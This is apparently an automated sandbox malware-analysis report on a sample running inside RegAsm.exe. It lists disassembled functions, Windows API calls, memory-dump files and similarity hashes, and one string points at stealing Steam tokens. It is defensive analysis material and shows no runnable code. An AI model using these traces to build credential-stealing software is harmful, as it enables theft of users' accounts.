                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00415250 Relevance: 4.6, APIs: 3, Instructions: 111sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4198075804-0
                                                                                                                                                                                                                                                    • Opcode ID: 7a6b2aeafc6c4f1accb92d408c8efe124ebf21878ae26fecf69b7519f8558f6b
                                                                                                                                                                                                                                                    • Instruction ID: cd6bac42ab6ce3e86cfc8751403faf569da8662e40f3139f420eac05544630ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a6b2aeafc6c4f1accb92d408c8efe124ebf21878ae26fecf69b7519f8558f6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE414F35904288EFDB11EFE4C985ADDBBB4AF18704F10417EE806636C1DB782A08CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C6D3095
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C75F688,00001000), ref: 6C6D35D5
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6D35E0
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6D35FD
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6D363F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6D369F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: __aulldiv.LIBCMT ref: 6C6D36E4
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D309F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B85
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: EnterCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B90
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: LeaveCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5BD8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: GetTickCount64.KERNEL32 ref: 6C6F5BE4
                                                                                                                                                                                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6D30BE
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C6D3127
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D30F0: __aulldiv.LIBCMT ref: 6C6D3140
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB2A: __onexit.LIBCMT ref: 6C70AB30
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4291168024-0
                                                                                                                                                                                                                                                    • Opcode ID: d27dc290aeecb51577f653887652b5331eba1a9a4fc4210fc9d72866eceee054
                                                                                                                                                                                                                                                    • Instruction ID: cb03430bdc4091a478c7ce0de49e785a072e03b2e1765737686e649185b8b484
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d27dc290aeecb51577f653887652b5331eba1a9a4fc4210fc9d72866eceee054
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0F962E2074896CA10EF3489811E6B3B0EF6B114F915339E84853591FF2072D88389
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00411880 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041189C
                                                                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118B7
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004118BE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3183270410-0
                                                                                                                                                                                                                                                    • Opcode ID: f20b2d72251e267e66a48cf40679e38111389fd80e9f6df2b318941e64abc791
                                                                                                                                                                                                                                                    • Instruction ID: b6f0f7a2a868c8418c92e5dd189a1497bce6fa9a94281203e17b5af53dede2a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f20b2d72251e267e66a48cf40679e38111389fd80e9f6df2b318941e64abc791
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81F0A735A0563877E720AB94DC05FDE77689B05714F004195FF84AB2D0DAF45EC487D5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00406900 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000040,Vj@,?,?,?,?,00406A56,?,?,?,?,00000000), ref: 00406975
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID: Vj@
                                                                                                                                                                                                                                                    • API String ID: 544645111-2126399917
                                                                                                                                                                                                                                                    • Opcode ID: bdfb7b917f3f703cfce727fbfd478be771f3d57ba6f1b7257c266257cef2b284
                                                                                                                                                                                                                                                    • Instruction ID: 7c3753fe3928ac4ad57f92e0e7a78c02158cd505352ef7d4175bafa3efee33a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdfb7b917f3f703cfce727fbfd478be771f3d57ba6f1b7257c266257cef2b284
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 461125B16081069FD724DF4CD8907A6F3DAFB08300F11053BE98ED3680D279AC608B9A
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00411530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                    • String ID: ^iB
                                                                                                                                                                                                                                                    • API String ID: 1699248803-3045993210
                                                                                                                                                                                                                                                    • Opcode ID: 3732e4f0bb9771f3878e03f29327f4a4c84644b9cac77449963bca985e5d095e
                                                                                                                                                                                                                                                    • Instruction ID: 509103397ae345eed66ddb753eac4c44869d2dba2a79171c705cad477cde571b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3732e4f0bb9771f3878e03f29327f4a4c84644b9cac77449963bca985e5d095e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AF08231A1015CABDB10DB58DC51B9DB7FDDB44715F1041A6AD08A32C0D6706F069B94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004114D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 3188754299-3946550938
                                                                                                                                                                                                                                                    • Opcode ID: 844521e8f23f5fc9af956f529f4a760610d8911ab90b9e8e197f8ca0b881ecf7
                                                                                                                                                                                                                                                    • Instruction ID: ab1914b3972fcb297bc9e6f42ca73adc577e1af864022de30c8b958231af084c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 844521e8f23f5fc9af956f529f4a760610d8911ab90b9e8e197f8ca0b881ecf7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF08275904A58ABC720DF98D845B99B768EB05B30F10476AF836A37D0C7386A408AD4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410B80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410B95
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 2831436455-1654365787
                                                                                                                                                                                                                                                    • Opcode ID: 262953bc8db2210ddedc1a9ca226e6d685cb9d2cb00c1d423f8b5143abe07271
                                                                                                                                                                                                                                                    • Instruction ID: 0429c7b21ad6090c35499c7d32074d16d2d01d669df86bc9dd77705ceff38c3e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 262953bc8db2210ddedc1a9ca226e6d685cb9d2cb00c1d423f8b5143abe07271
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AE0923170412C57DF20AADCAC027ED776CAB04615F0001BAFD08E3280DE689A0847D9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00417EE9 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 127sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3472027048-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 3135880ad6352656b5859012c2f66598398155e5f5a85533f41f39dfa0cc6087
                                                                                                                                                                                                                                                    • Instruction ID: 5981c636b0eedc11d4d0936a36a307c54ced3acd90c85a578ad9c276faefc986
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3135880ad6352656b5859012c2f66598398155e5f5a85533f41f39dfa0cc6087
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61517370D45389EADB10FBA5C946BDDBBB46F14708F1440AEE549332C2DB781B488A6B
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004153D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004271AE,?,00000000,00422200,000000FF,?,00417E9A,?), ref: 00415437
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 0041544F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                    • API String ID: 2356188485-3507145866
                                                                                                                                                                                                                                                    • Opcode ID: ee529804bca6a16a5c19857bb7a99558860a67a702c88e98654b2327ab73bd0c
                                                                                                                                                                                                                                                    • Instruction ID: 727f60d06c0b895dfb1919a904ef9184cf5e6f48b522136d386c228dc396eab6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee529804bca6a16a5c19857bb7a99558860a67a702c88e98654b2327ab73bd0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7218271804248EADB10FBE5C906BDDBB78AF18714F10417EE416336D2DB782708CAB6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00407EA0 Relevance: 2.8, APIs: 2, Instructions: 260stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040810B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040811F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
